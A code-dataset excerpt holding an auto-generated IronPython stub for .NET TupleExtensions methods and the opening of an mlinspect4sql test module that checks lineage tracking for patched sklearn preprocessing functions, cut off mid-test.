41a9031ea1bf58391b018435e6cf7b6a66c70bbe | 11,600 | py | Python | release/stubs.min/System/__init___parts/TupleExtensions.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/System/__init___parts/TupleExtensions.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/System/__init___parts/TupleExtensions.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | class TupleExtensions(object):
# no doc
@staticmethod
def Deconstruct(
value,
item1,
item2=None,
item3=None,
item4=None,
item5=None,
item6=None,
item7=None,
item8=None,
item9=None,
item10=None,
item11=None,
item12=None,
item13=None,
item14=None,
item15=None,
item16=None,
item17=None,
item18=None,
item19=None,
item20=None,
item21=None,
):
"""
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15]]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16]]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19,T20)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19,T20]]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19,T20)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19,T20,T21)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19,T20,T21]]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19,T20,T21)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19]]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17]]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18]]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11)
Deconstruct[(T1,T2,T3,T4)](value: Tuple[T1,T2,T3,T4]) -> (T1,T2,T3,T4)
Deconstruct[(T1,T2,T3,T4,T5)](value: Tuple[T1,T2,T3,T4,T5]) -> (T1,T2,T3,T4,T5)
Deconstruct[(T1,T2,T3)](value: Tuple[T1,T2,T3]) -> (T1,T2,T3)
Deconstruct[T1](value: Tuple[T1]) -> T1
Deconstruct[(T1,T2)](value: Tuple[T1,T2]) -> (T1,T2)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8]]) -> (T1,T2,T3,T4,T5,T6,T7,T8)
Deconstruct[(T1,T2,T3,T4,T5,T6)](value: Tuple[T1,T2,T3,T4,T5,T6]) -> (T1,T2,T3,T4,T5,T6)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7)](value: Tuple[T1,T2,T3,T4,T5,T6,T7]) -> (T1,T2,T3,T4,T5,T6,T7)
"""
pass
@staticmethod
def ToTuple(value):
"""
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15]]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15]]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16]]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16]]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19,T20)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17,T18,T19,T20]]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19,T20]]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19,T20,T21)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17,T18,T19,T20,T21]]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19,T20,T21]]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17,T18,T19]]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19]]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17]]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17]]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17,T18]]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18]]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11]]
ToTuple[(T1,T2,T3,T4)](value: ValueTuple[T1,T2,T3,T4]) -> Tuple[T1,T2,T3,T4]
ToTuple[(T1,T2,T3,T4,T5)](value: ValueTuple[T1,T2,T3,T4,T5]) -> Tuple[T1,T2,T3,T4,T5]
ToTuple[(T1,T2,T3)](value: ValueTuple[T1,T2,T3]) -> Tuple[T1,T2,T3]
ToTuple[T1](value: ValueTuple[T1]) -> Tuple[T1]
ToTuple[(T1,T2)](value: ValueTuple[T1,T2]) -> Tuple[T1,T2]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8]]
ToTuple[(T1,T2,T3,T4,T5,T6)](value: ValueTuple[T1,T2,T3,T4,T5,T6]) -> Tuple[T1,T2,T3,T4,T5,T6]
ToTuple[(T1,T2,T3,T4,T5,T6,T7)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7]) -> Tuple[T1,T2,T3,T4,T5,T6,T7]
"""
pass
@staticmethod
def ToValueTuple(value):
"""
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15]]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15]]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16]]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16]]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19,T20)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19,T20]]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17,T18,T19,T20]]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19,T20,T21)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19,T20,T21]]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17,T18,T19,T20,T21]]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19]]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17,T18,T19]]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17]]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17]]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18]]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17,T18]]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11]]
ToValueTuple[(T1,T2,T3,T4)](value: Tuple[T1,T2,T3,T4]) -> ValueTuple[T1,T2,T3,T4]
ToValueTuple[(T1,T2,T3,T4,T5)](value: Tuple[T1,T2,T3,T4,T5]) -> ValueTuple[T1,T2,T3,T4,T5]
ToValueTuple[(T1,T2,T3)](value: Tuple[T1,T2,T3]) -> ValueTuple[T1,T2,T3]
ToValueTuple[T1](value: Tuple[T1]) -> ValueTuple[T1]
ToValueTuple[(T1,T2)](value: Tuple[T1,T2]) -> ValueTuple[T1,T2]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8]]
ToValueTuple[(T1,T2,T3,T4,T5,T6)](value: Tuple[T1,T2,T3,T4,T5,T6]) -> ValueTuple[T1,T2,T3,T4,T5,T6]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7)](value: Tuple[T1,T2,T3,T4,T5,T6,T7]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7]
"""
pass
__all__ = [
"Deconstruct",
"ToTuple",
"ToValueTuple",
]
| 67.44186 | 311 | 0.658793 | 2,480 | 11,600 | 3.079839 | 0.023387 | 0.094266 | 0.134328 | 0.169678 | 0.924588 | 0.911495 | 0.89238 | 0.878502 | 0.857031 | 0.844855 | 0 | 0.264449 | 0.082672 | 11,600 | 171 | 312 | 67.836257 | 0.453341 | 0.905603 | 0 | 0.157895 | 0 | 0 | 0.038961 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078947 | false | 0.078947 | 0 | 0 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 11 |
41c69829afa35346409197c00992bfb2043f2647 | 70,913 | py | Python | test/monkeypatching/test_patch_sklearn.py | tum-db/mlinspect4sql | 863f1a98baff92341722b4fb180008cf9b518b80 | [
"Apache-2.0"
] | null | null | null | test/monkeypatching/test_patch_sklearn.py | tum-db/mlinspect4sql | 863f1a98baff92341722b4fb180008cf9b518b80 | [
"Apache-2.0"
] | null | null | null | test/monkeypatching/test_patch_sklearn.py | tum-db/mlinspect4sql | 863f1a98baff92341722b4fb180008cf9b518b80 | [
"Apache-2.0"
] | null | null | null | """
Tests whether the monkey patching works for all patched sklearn methods
"""
# pylint: disable=too-many-lines
from inspect import cleandoc
import networkx
import numpy
import pandas
from pandas import DataFrame
from testfixtures import compare
from mlinspect import OperatorType, OperatorContext, FunctionInfo
from mlinspect.instrumentation import _pipeline_executor
from mlinspect.instrumentation._dag_node import DagNode, CodeReference, BasicCodeLocation, DagNodeDetails, \
OptionalCodeInfo
from mlinspect.inspections._lineage import RowLineage, LineageId
def test_label_binarize():
"""
Tests whether the monkey patching of ('sklearn.preprocessing._label', 'label_binarize') works
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import label_binarize
import numpy as np
pd_series = pd.Series(['yes', 'no', 'no', 'yes'], name='A')
binarized = label_binarize(pd_series, classes=['no', 'yes'])
expected = np.array([[1], [0], [0], [1]])
assert np.array_equal(binarized, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 5),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.series', 'Series')),
DagNodeDetails(None, ['A']),
OptionalCodeInfo(CodeReference(5, 12, 5, 59),
"pd.Series(['yes', 'no', 'no', 'yes'], name='A')"))
expected_binarize = DagNode(1,
BasicCodeLocation("<string-source>", 6),
OperatorContext(OperatorType.PROJECTION_MODIFY,
FunctionInfo('sklearn.preprocessing._label', 'label_binarize')),
DagNodeDetails("label_binarize, classes: ['no', 'yes']", ['array']),
OptionalCodeInfo(CodeReference(6, 12, 6, 60),
"label_binarize(pd_series, classes=['no', 'yes'])"))
expected_dag.add_edge(expected_data_source, expected_binarize)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_binarize]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([1]), {LineageId(0, 0)}],
[numpy.array([0]), {LineageId(0, 1)}],
[numpy.array([0]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_train_test_split():
"""
Tests whether the monkey patching of ('sklearn.model_selection._split', 'train_test_split') works
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.model_selection import train_test_split
pandas_df = pd.DataFrame({'A': [1, 2, 10, 5]})
train_data, test_data = train_test_split(pandas_df, random_state=0)
expected_train = pd.DataFrame({'A': [5, 2, 1]})
expected_test = pd.DataFrame({'A': [10]})
pd.testing.assert_frame_equal(train_data.reset_index(drop=True), expected_train.reset_index(drop=True))
pd.testing.assert_frame_equal(test_data.reset_index(drop=True), expected_test.reset_index(drop=True))
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
inspector_result.dag.remove_node(list(inspector_result.dag.nodes)[4])
inspector_result.dag.remove_node(list(inspector_result.dag.nodes)[3])
expected_dag = networkx.DiGraph()
expected_source = DagNode(0,
BasicCodeLocation("<string-source>", 4),
OperatorContext(OperatorType.DATA_SOURCE, FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A']),
OptionalCodeInfo(CodeReference(4, 12, 4, 46), "pd.DataFrame({'A': [1, 2, 10, 5]})"))
expected_train = DagNode(1,
BasicCodeLocation("<string-source>", 5),
OperatorContext(OperatorType.TRAIN_TEST_SPLIT,
FunctionInfo('sklearn.model_selection._split', 'train_test_split')),
DagNodeDetails('(Train Data)', ['A']),
OptionalCodeInfo(CodeReference(5, 24, 5, 67),
'train_test_split(pandas_df, random_state=0)'))
expected_dag.add_edge(expected_source, expected_train)
expected_test = DagNode(2,
BasicCodeLocation("<string-source>", 5),
OperatorContext(OperatorType.TRAIN_TEST_SPLIT,
FunctionInfo('sklearn.model_selection._split', 'train_test_split')),
DagNodeDetails('(Test Data)', ['A']),
OptionalCodeInfo(CodeReference(5, 24, 5, 67),
'train_test_split(pandas_df, random_state=0)'))
expected_dag.add_edge(expected_source, expected_test)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_train]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[5, {LineageId(0, 3)}],
[2, {LineageId(0, 1)}],
[1, {LineageId(0, 0)}]],
columns=['A', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_test]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[10, {LineageId(0, 2)}]], columns=['A', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_standard_scaler():
"""
Tests whether the monkey patching of ('sklearn.preprocessing._data', 'StandardScaler') works
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import StandardScaler
import numpy as np
df = pd.DataFrame({'A': [1, 2, 10, 5]})
standard_scaler = StandardScaler()
encoded_data = standard_scaler.fit_transform(df)
expected = np.array([[-1.], [-0.71428571], [1.57142857], [0.14285714]])
assert np.allclose(encoded_data, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 5),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A']),
OptionalCodeInfo(CodeReference(5, 5, 5, 39), "pd.DataFrame({'A': [1, 2, 10, 5]})"))
expected_transformer = DagNode(1,
BasicCodeLocation("<string-source>", 6),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._data', 'StandardScaler')),
DagNodeDetails('Standard Scaler', ['array']),
OptionalCodeInfo(CodeReference(6, 18, 6, 34), 'StandardScaler()'))
expected_dag.add_edge(expected_data_source, expected_transformer)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_transformer]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([-1.0]), {LineageId(0, 0)}],
[numpy.array([-0.7142857142857143]), {LineageId(0, 1)}],
[numpy.array([1.5714285714285714]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_kbins_discretizer():
"""
Tests whether the monkey patching of ('sklearn.preprocessing._discretization', 'KBinsDiscretizer') works
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import KBinsDiscretizer
import numpy as np
df = pd.DataFrame({'A': [1, 2, 10, 5]})
discretizer = KBinsDiscretizer(n_bins=3, encode='ordinal', strategy='uniform')
encoded_data = discretizer.fit_transform(df)
expected = np.array([[0.], [0.], [2.], [1.]])
assert np.allclose(encoded_data, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 5),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A']),
OptionalCodeInfo(CodeReference(5, 5, 5, 39), "pd.DataFrame({'A': [1, 2, 10, 5]})"))
expected_transformer = DagNode(1,
BasicCodeLocation("<string-source>", 6),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._discretization',
'KBinsDiscretizer')),
DagNodeDetails('K-Bins Discretizer', ['array']),
OptionalCodeInfo(CodeReference(6, 14, 6, 78),
"KBinsDiscretizer(n_bins=3, encode='ordinal', strategy='uniform')"))
expected_dag.add_edge(expected_data_source, expected_transformer)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_transformer]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([0.]), {LineageId(0, 0)}],
[numpy.array([0.]), {LineageId(0, 1)}],
[numpy.array([2.]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_simple_imputer():
"""
Tests whether the monkey patching of ('sklearn.impute._base’, 'SimpleImputer') works
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.impute import SimpleImputer
import numpy as np
df = pd.DataFrame({'A': ['cat_a', np.nan, 'cat_a', 'cat_c']})
imputer = SimpleImputer(missing_values=np.nan, strategy='most_frequent')
imputed_data = imputer.fit_transform(df)
expected = np.array([['cat_a'], ['cat_a'], ['cat_a'], ['cat_c']])
assert np.array_equal(imputed_data, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 5),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A']),
OptionalCodeInfo(CodeReference(5, 5, 5, 61),
"pd.DataFrame({'A': ['cat_a', np.nan, 'cat_a', 'cat_c']})"))
expected_transformer = DagNode(1,
BasicCodeLocation("<string-source>", 6),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.impute._base', 'SimpleImputer')),
DagNodeDetails('Simple Imputer', ['A']),
OptionalCodeInfo(CodeReference(6, 10, 6, 72),
"SimpleImputer(missing_values=np.nan, strategy='most_frequent')"))
expected_dag.add_edge(expected_data_source, expected_transformer)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_transformer]
lineage_output = inspection_results_data_source[RowLineage(3)]
